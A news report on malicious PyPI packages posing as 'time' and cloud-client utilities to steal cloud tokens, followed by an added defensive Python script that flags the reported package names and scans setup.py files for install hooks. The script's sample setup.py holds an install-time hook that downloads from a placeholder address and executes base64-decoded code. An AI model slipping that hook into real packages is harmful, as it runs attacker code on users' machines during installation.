Cybersecurity researchers have flagged a malicious campaign targeting Python Package Index (PyPI) users. The campaign relies on counterfeit libraries that pose as "time" utilities and cloud client helpers but are built to steal sensitive information such as cloud access tokens.
Security company ReversingLabs says it identified two groups of packages, 20 in total, with a combined download count exceeding 14,100:
- snapshot-photo (2,448 downloads)
- time-check-server (316 downloads)
- time-check-server-get (178 downloads)
- time-server-analysis (144 downloads)
- time-server-analyzer (74 downloads)
- time-server-test (155 downloads)
- time-service-checker (151 downloads)
- aclient-sdk (120 downloads)
- acloud-client (5,496 downloads)
- acloud-clients (198 downloads)
- acloud-client-uses (294 downloads)
- alicloud-client (622 downloads)
- alicloud-client-sdk (206 downloads)
- amzclients-sdk (100 downloads)
- awscloud-clients-core (206 downloads)
- credential-python-sdk (1,155 downloads)
- enumer-iam (1,254 downloads)
- tclients-sdk (173 downloads)
- tcloud-python-sdks (98 downloads)
- tcloud-python-test (793 downloads)
The first set of packages uploads data to the threat actor's infrastructure, while the second set implements cloud client functionality for services such as Alibaba Cloud, Amazon Web Services, and Tencent Cloud.
In short, the attackers used the "time" packages as a lure to siphon off cloud secrets. All of the identified malicious packages have since been removed from PyPI.
Further investigation has shown that three of these packages—acloud-client, enumer-iam, and tcloud-python-test—have been listed as dependencies in a popular GitHub project called accesskey_tools, which has been forked 42 times and starred 519 times.
A commit referencing tcloud-python-test was made on November 8, 2023, which indicates the package has been available on PyPI since at least that date. According to pepy.tech statistics, it has been downloaded 793 times.
The findings coincide with a Fortinet FortiGuard Labs report on numerous packages on PyPI and npm that carry suspicious install scripts designed to execute malicious code during installation or to contact external servers.
“Suspicious URLs play a critical role in identifying potentially malicious packages as they are often used for downloading additional payloads or establishing communication with command-and-control servers, granting attackers control over compromised systems,” noted Jenna Wang.
“In 974 packages, such URLs pose a risk of data exfiltration, additional malware downloads, and other malicious activities. It is imperative to closely examine and monitor external URLs in package dependencies to thwart exploitation.”
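As an added example (not part of the original article, and not tooling from ReversingLabs or Fortinet), the following Python script applies both checks discussed above to a project: it looks for the package names from the ReversingLabs list in a requirements file, normalising names the way PyPI does so that spelling variants such as `Tcloud_Python.Test` still match, and it statically scans a setup.py for the install-time hooks (subclasses or `cmdclass` overrides of setuptools install commands), network or exec-style calls, and hard-coded URLs that the FortiGuard heuristic keys on. The requirements file and setup.py it analyses are constructed samples, including the 203.0.113.10 documentation address, and are not material from accesskey_tools or from any package named in the article.

```python
# Added example: static triage of a dependency list and a setup.py.
# Sample inputs below are constructed for illustration only.
import ast
import re

# Names reported by ReversingLabs (copied from the list in the article).
REPORTED_MALICIOUS = {
    "snapshot-photo", "time-check-server", "time-check-server-get",
    "time-server-analysis", "time-server-analyzer", "time-server-test",
    "time-service-checker", "aclient-sdk", "acloud-client", "acloud-clients",
    "acloud-client-uses", "alicloud-client", "alicloud-client-sdk",
    "amzclients-sdk", "awscloud-clients-core", "credential-python-sdk",
    "enumer-iam", "tclients-sdk", "tcloud-python-sdks", "tcloud-python-test",
}
# setuptools commands that run during `pip install`; overriding them via a
# subclass or cmdclass is the usual way to execute code at install time.
INSTALL_COMMANDS = {"install", "develop", "egg_info", "build_py", "bdist_egg"}
# Calls that rarely belong in setup.py: fetching, shelling out, decoding and
# executing payloads. Matched on the last dotted component or the full name.
SUSPICIOUS_TAIL = {"urlopen", "urlretrieve", "system", "popen", "Popen",
                   "check_output", "b64decode", "exec", "eval"}
SUSPICIOUS_FULL = {"subprocess.run", "subprocess.call", "requests.get",
                   "requests.post"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def normalize(name):
    """PEP 503 normalisation: lower-case, runs of '-', '_' or '.' become '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def requirement_name(line):
    """Normalised project name from one requirements.txt line, or None."""
    line = line.split("#", 1)[0].strip()          # drop trailing comments
    if not line or line.startswith("-"):           # blank line or pip option
        return None
    m = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
    return normalize(m.group(0)) if m else None


def flag_requirements(text):
    """Return the reported-malicious names present in a requirements file."""
    names = (requirement_name(line) for line in text.splitlines())
    return [n for n in names if n in REPORTED_MALICIOUS]


def dotted(node):
    """'pkg.mod.func' for a Name/Attribute chain, '' for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        prefix = dotted(node.value)
        return f"{prefix}.{node.attr}" if prefix else node.attr
    return ""


def scan_setup_py(source):
    """List install hooks, suspicious calls and URL literals in setup.py source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):                 # class X(install): ...
            for base in node.bases:
                tail = dotted(base).rsplit(".", 1)[-1]
                if tail in INSTALL_COMMANDS:
                    findings.append(f"install hook: class {node.name} subclasses {tail}")
        elif (isinstance(node, ast.keyword) and node.arg == "cmdclass"
              and isinstance(node.value, ast.Dict)):      # cmdclass={"install": X}
            for key in node.value.keys:
                if isinstance(key, ast.Constant) and key.value in INSTALL_COMMANDS:
                    findings.append(f"cmdclass overrides {key.value}")
        elif isinstance(node, ast.Call):
            name = dotted(node.func)
            if name in SUSPICIOUS_FULL or name.rsplit(".", 1)[-1] in SUSPICIOUS_TAIL:
                findings.append(f"suspicious call {name} at line {node.lineno}")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in URL_RE.findall(node.value):
                findings.append(f"url {url} at line {node.lineno}")
    return findings


# Constructed sample inputs (not the accesskey_tools project or a real package).
SAMPLE_REQUIREMENTS = """\
requests>=2.31
Tcloud_Python.Test==0.1.0   # normalises to tcloud-python-test
boto3
enumer-iam
"""

SAMPLE_SETUP_PY = '''\
# constructed setup.py showing the install-hook pattern; 203.0.113.10 is a
# documentation (TEST-NET-3) address, not a real server
from setuptools import setup
from setuptools.command.install import install
import base64, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        data = urllib.request.urlopen("http://203.0.113.10/payload").read()
        exec(base64.b64decode(data))

setup(name="time-check-server", version="0.1", cmdclass={"install": PostInstall})
'''
```

Running `flag_requirements(SAMPLE_REQUIREMENTS)` returns the two listed names, and `scan_setup_py(SAMPLE_SETUP_PY)` reports the `install` subclass, the `cmdclass` override, the `urlopen`, `b64decode` and `exec` calls, and the hard-coded URL, which is exactly the combination of signals that should stop a package at review rather than at first install. The scan is a static heuristic: it will miss code that builds URLs at runtime or hides the hook in a pulled-in module, so it complements, rather than replaces, installing untrusted packages in an isolated environment.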